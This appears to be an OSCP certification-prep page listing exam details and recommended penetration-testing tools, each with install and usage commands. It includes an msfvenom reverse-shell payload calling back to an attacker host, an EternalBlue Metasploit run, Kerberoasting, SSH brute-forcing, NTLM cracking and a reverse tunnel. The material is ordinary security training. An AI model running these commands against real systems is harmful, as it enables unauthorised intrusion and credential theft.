OSCP

OffSec

Offensive Security Certified Professional

Advanced 24hr practical exam + written report Pass: 70 points (passing) $1,499

Industry gold standard for penetration testing. Requires real exploitation of live machines in 24 hours. No multiple choice.

Official Page

IssuerOffSec

Format24hr practical exam + written report

Duration48 hours total

Pass Score70 points (passing)

Valid For3y

Overview Syllabus (8) Tools (8) Cheat Sheets (5) Labs (1)

Recommended Tools

BloodHound Essential

Active Directory

AD attack path visualization and enumeration

installsudo apt install bloodhound

usagebloodhound-python -d domain.local -u user -p pass -ns 10.10.10.x -c all

Impacket Essential

Active Directory

Python toolkit for AD and network protocol attacks

installpip3 install impacket

usageGetUserSPNs.py domain/user:pass -dc-ip 10.10.10.x -request

CrackMapExec Essential

Enumeration

AD/SMB enumeration and attack automation

installpip3 install crackmapexec

usagecme smb 10.10.10.0/24 -u user -p pass --shares

enum4linux Essential

Enumeration

SMB/NetBIOS enumeration for Windows/Samba hosts

installsudo apt install enum4linux

usageenum4linux -a 10.10.10.x

ffuf Essential

Enumeration

Fast web fuzzer for dirs, params and vhosts

installsudo apt install ffuf

usageffuf -u http://target/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt -fc 404

Gobuster Essential

Enumeration

Directory, file and DNS brute-force enumeration

installsudo apt install gobuster

usagegobuster dir -u http://target -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt

Nmap Essential

Enumeration

Network scanner for port, service, OS and script-based detection

installsudo apt install nmap

usagenmap -sC -sV -p- --open -oA scan 10.10.10.x

msfvenom Essential

Exploit Dev

Metasploit payload generator

installsudo apt install metasploit-framework

usagemsfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.x LPORT=4444 -f exe -b "\x00" -o shell.exe

Metasploit Essential

Exploitation

Comprehensive exploitation framework with 2000+ modules

installsudo apt install metasploit-framework

usagemsfconsole; use exploit/windows/smb/ms17_010_eternalblue; set RHOSTS target; run

Searchsploit Essential

Exploitation

Offline ExploitDB search and mirror tool

installsudo apt install exploitdb

usagesearchsploit -m 39161; searchsploit --update

Hashcat Essential

Password Attacks

GPU-accelerated password cracking

installsudo apt install hashcat

usagehashcat -m 1000 ntlm.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

Hydra Essential

Password Attacks

Network login brute-force tool

installsudo apt install hydra

usagehydra -l admin -P rockyou.txt ssh://10.10.10.x

Chisel Essential

Pivoting

Fast TCP tunnel over HTTP

installgo install github.com/jpillora/chisel@latest

usagechisel server -p 8888 --reverse (attacker); chisel client 10.10.14.x:8888 R:socks

Evil-WinRM Essential

Post-Exploitation

WinRM interactive shell for pentesting

installgem install evil-winrm

usageevil-winrm -i 10.10.10.x -u Administrator -p Password123

LinPEAS Essential

Post-Exploitation

Linux privilege escalation automated enumeration

installcurl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh -o linpeas.sh

usagebash linpeas.sh 2>/dev/null | tee linpeas.txt

WinPEAS Essential

Post-Exploitation

Windows privilege escalation automated enumeration

installcurl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASx64.exe -o winpeas.exe

usagewinpeas.exe log > winpeas.txt

Burp Suite Essential

Web Attacks

Web proxy for HTTP interception and manipulation

installDownload from portswigger.net

usageConfigure browser proxy 127.0.0.1:8080

SQLMap Essential

Web Attacks

Automated SQL injection detection and exploitation

installsudo apt install sqlmap

usagesqlmap -u "http://target/page?id=1" --dbs --batch --level 3 --risk 2